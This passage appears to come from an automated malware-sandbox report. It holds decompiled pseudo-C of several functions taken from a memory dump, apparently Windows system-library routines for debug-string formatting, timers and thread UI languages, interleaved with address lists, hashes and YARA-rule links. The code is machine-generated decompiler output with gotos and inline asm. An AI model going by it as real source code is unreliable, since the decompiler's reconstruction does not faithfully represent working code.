						goto L19;
					}
				}
			}

0x0465e620
0x0465e628
0x0465e62f
0x0465e631
0x0465e635
0x0465e637
0x0465e63e
0x046b5503
0x046b5503
0x0465e64c
0x0465e64c
0x0465e651
0x00000000
0x00000000
0x0465e661
0x0465e665
0x046b542a
0x0465e715
0x0465e71a
0x0465e71c
0x0465e720
0x0465e720
0x0465e727
0x0465e736
0x0465e736
0x0465e743
0x0465e743
0x0465e673
0x0465e678
0x0465e67d
0x0465e682
0x0465e685
0x0465e692
0x0465e69b
0x0465e6a3
0x0465e6ad
0x0465e6b1
0x0465e6b2
0x0465e6bb
0x0465e6bf
0x0465e6c0
0x0465e6c8
0x0465e6cc
0x0465e6d5
0x0465e6d9
0x00000000
0x00000000
0x0465e6e5
0x0465e6ea
0x0465e6f9
0x0465e70b
0x0465e70f
0x046b5439
0x046b545e
0x046b545e
0x00000000
0x046b545e
0x046b543b
0x046b543e
0x046b5440
0x046b5445
0x046b5472
0x046b5475
0x046b548d
0x046b5493
0x046b54a9
0x00000000
0x00000000
0x046b54ab
0x046b54b4
0x046b54bc
0x046b54c8
0x046b54de
0x046b54fb
0x046b54e0
0x046b54e6
0x046b54eb
0x046b54eb
0x046b54de
0x00000000
0x046b54bc
0x046b5477
0x046b547a
0x046b5480
0x046b5483
0x046b5486
0x046b548b
0x00000000
0x00000000
0x00000000
0x046b548b
0x00000000
0x00000000
0x00000000
0x00000000
0x046b5447
0x046b5447
0x046b5447
0x046b5447
0x046b544e
0x00000000
0x00000000
0x046b5450
0x046b5452
0x046b5455
0x046b545a
0x00000000
0x00000000
0x00000000
0x046b545c
0x046b546a
0x046b546d
0x046b546f
0x00000000
0x046b546f
0x0465e70f

Strings

InstallLanguageFallback, xrefs: 0465E6DB
@, xrefs: 0465E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0465E68C

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 790897642038702e03709c8d26705a4a2f7a32a2eabc5285e6cc594626b42fbd
Instruction ID: 0c32272a6db7516793871a2b4e79dec36ef8b429b300b55d2c70c0b367522e0d
Opcode Fuzzy Hash: 790897642038702e03709c8d26705a4a2f7a32a2eabc5285e6cc594626b42fbd
Instruction Fuzzy Hash: 3C51BFB2504355ABDB14DF64C450AABB3E8BF98719F04092EF986D7350FB30EA44C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0465B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0465B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x472f7a8);
				E046AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E046AD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0469D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0469F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L046ADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0469B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0469B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0469E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0469A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0465b171
0x0465b171
0x0465b171
0x0465b171
0x0465b171
0x0465b176
0x0465b17b
0x0465b180
0x0465b186
0x0465b18f
0x0465b198
0x0465b1a4
0x0465b1aa
0x046b4802
0x046b4802
0x046b4805
0x046b480c
0x046b480e
0x0465b1d1
0x0465b1d3
0x0465b1de
0x0465b1de
0x046b4817
0x046b481e
0x046b4820
0x046b4822
0x046b4822
0x046b4824
0x046b4824
0x046b482a
0x00000000
0x00000000
0x046b4835
0x046b483a
0x046b483d
0x046b483f
0x046b4842
0x046b4842
0x046b4842
0x046b4846
0x046b484c
0x046b484e
0x046b4851
0x046b4851
0x046b4853
0x046b4854
0x046b4854
0x046b4858
0x046b485a
0x046b485a
0x046b485d
0x046b485f
0x046b4861
0x046b4861
0x046b4866
0x046b486b
0x046b486e
0x046b4871
0x046b4876
0x046b4876
0x046b4878
0x046b487b
0x046b4884
0x046b4884
0x00000000
0x046b487d
0x046b487d
0x046b4882
0x046b4889
0x046b4889
0x046b488f
0x046b4891
0x046b48e0
0x046b48e2
0x046b48e4
0x046b48e4
0x046b48e7
0x046b48e7
0x046b48ed
0x046b48f4
0x046b48f6
0x046b4951
0x046b4951
0x046b4953
0x046b4953
0x046b4956
0x046b4956
0x046b4958
0x046b4959
0x046b4959
0x046b495d
0x046b495d
0x046b495f
0x046b495f
0x046b4965
0x046b4969
0x046b49ba
0x046b49ba
0x046b49c1
0x046b49c5
0x046b49cc
0x046b49d4
0x046b49d7
0x046b49da
0x046b49e4
0x046b49e5
0x046b49f3
0x046b4a02
0x00000000
0x046b4a02
0x046b4972
0x046b4974
0x00000000
0x00000000
0x046b4976
0x046b4979
0x046b4982
0x046b4983
0x046b4984
0x046b498b
0x046b498d
0x046b4991
0x046b4993
0x046b4999
0x046b499d
0x046b49a2
0x046b49a2
0x046b49a2
0x046b4999
0x046b49ac
0x00000000
0x046b49b3
0x046b48f8
0x046b48fe
0x00000000
0x00000000
0x00000000
0x046b48fe
0x046b4895
0x046b489c
0x046b48ad
0x046b48b2
0x046b48b5
0x046b48b7
0x046b48ba
0x046b48bc
0x046b48c6
0x046b48c6
0x046b48cb
0x046b48d1
0x046b48d4
0x046b48d8
0x046b48d8
0x00000000
0x046b48d8
0x046b48be
0x046b48c0
0x00000000
0x00000000
0x046b48c2
0x00000000
0x00000000
0x00000000
0x046b48c4
0x00000000
0x046b4882
0x046b487b
0x046b4904
0x046b4906
0x00000000
0x00000000
0x046b4908
0x046b490e
0x00000000
0x00000000
0x046b4910
0x046b4917
0x046b4917
0x00000000
0x046b4917
0x0465b1ba
0x046b47f9
0x046b47fc
0x00000000
0x00000000
0x00000000
0x046b47fc
0x0465b1c0
0x0465b1c0
0x0465b1c3
0x0465b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 046B48AD

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 0f3e0ef51755606287e5b4a151289b0aa467e50b24ec31dcecb8e07fccdf4dcd
Instruction ID: 639baf42a4f1b023a30d288fb1cd65287f67795ca5f4f1fea2dca9a004eebe21
Opcode Fuzzy Hash: 0f3e0ef51755606287e5b4a151289b0aa467e50b24ec31dcecb8e07fccdf4dcd
Instruction Fuzzy Hash: FE51B071D102598EEF35DF648844BFEBBB1AF04714F1041ADD899AB382EB70A981DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0467B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0467B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x474d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04677D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04728CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04699E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0469B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0469CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04677D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04728F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0469AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4748628; // 0x0
								_v68 = _t77;
								_t78 =  *0x474862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4748628; // 0x0
							_t116 =  *0x474862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0467b94c
0x0467b956
0x0467b95c
0x0467b95e
0x0467b964
0x0467b969
0x0467b96d
0x0467b96d
0x0467b970
0x0467b974
0x0467b97a
0x0467badf
0x0467badf
0x0467bae2
0x0467bae4
0x0467bae6
0x0467baf0
0x046c2cb8
0x0467baf6
0x0467baf6
0x0467baf6
0x0467bafd
0x0467bb1f
0x0467bb1f
0x0467baff
0x0467bb00
0x0467bb00
0x0467bb03
0x0467bb03
0x0467bacb
0x0467bacf
0x0467bad0
0x0467bad1
0x0467badc
0x0467badc
0x0467b980
0x0467b980
0x0467b988
0x0467b98b
0x0467b98d
0x0467b990
0x0467b993
0x0467b999
0x0467b99b
0x0467b9a1
0x0467b9a5
0x0467b9aa
0x0467b9b0
0x0467b9bb
0x0467b9c0
0x0467b9c3
0x0467b9ca
0x0467b9cc
0x0467b9cf
0x0467b9d3
0x0467b9d7
0x0467ba94
0x0467ba94
0x0467ba98
0x0467baa3
0x046c2ccb
0x0467baa9
0x0467baa9
0x0467baa9
0x0467bab1
0x046c2cd5
0x046c2cdd
0x046c2cdd
0x0467babb
0x0467babc
0x0467bac2
0x0467bac3
0x0467bac3
0x0467bac6
0x00000000
0x0467b9dd
0x0467b9dd
0x0467b9e7
0x0467b9e7
0x0467b9ec
0x0467b9ec
0x0467b9f1
0x0467b9f5
0x0467b9fa
0x0467ba00
0x0467ba0c
0x0467ba10
0x0467ba10
0x0467ba12
0x0467ba18
0x00000000
0x00000000
0x0467bb26
0x0467bb26
0x0467ba1e
0x0467ba1e
0x0467ba23
0x0467ba25
0x0467ba2c
0x0467ba30
0x0467ba35
0x0467ba35
0x0467ba41
0x0467ba46
0x0467ba4c
0x0467ba50
0x0467ba54
0x0467ba6a
0x0467ba6e
0x0467ba70
0x0467ba74
0x0467ba78
0x0467ba7a
0x0467ba7c
0x0467ba8e
0x0467ba90
0x0467ba92
0x0467bb14
0x0467bb14
0x0467bb16
0x0467bb16
0x00000000
0x0467ba7c
0x0467bb0a
0x0467bb0d
0x00000000
0x00000000
0x00000000
0x0467bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0467B9A5

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 3a8a3b572eee2ad930b45644d495b8f374c970691b02b6905c29aa8974b23379
Instruction ID: f83b498f21c1331d85148356f04e921e1027ea3a1ed656103011fffebbb00537
Opcode Fuzzy Hash: 3a8a3b572eee2ad930b45644d495b8f374c970691b02b6905c29aa8974b23379
Instruction Fuzzy Hash: 8A514871A08345CFC720EF28C08092ABBE5FB88A08F15896EF99587355E771FC44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0468FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0468FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0466EEF0(0x4747b60);
					_t134 =  *0x4747b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4747b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4747b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04666D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E046676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E046F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0465B150();
													}
													_t116 = E046F6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E046675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t122 = L046638A4( *0x4748638, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E046676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E046676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0468FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L046670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0468FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0468FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0468FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0468FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0468FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4747b80;
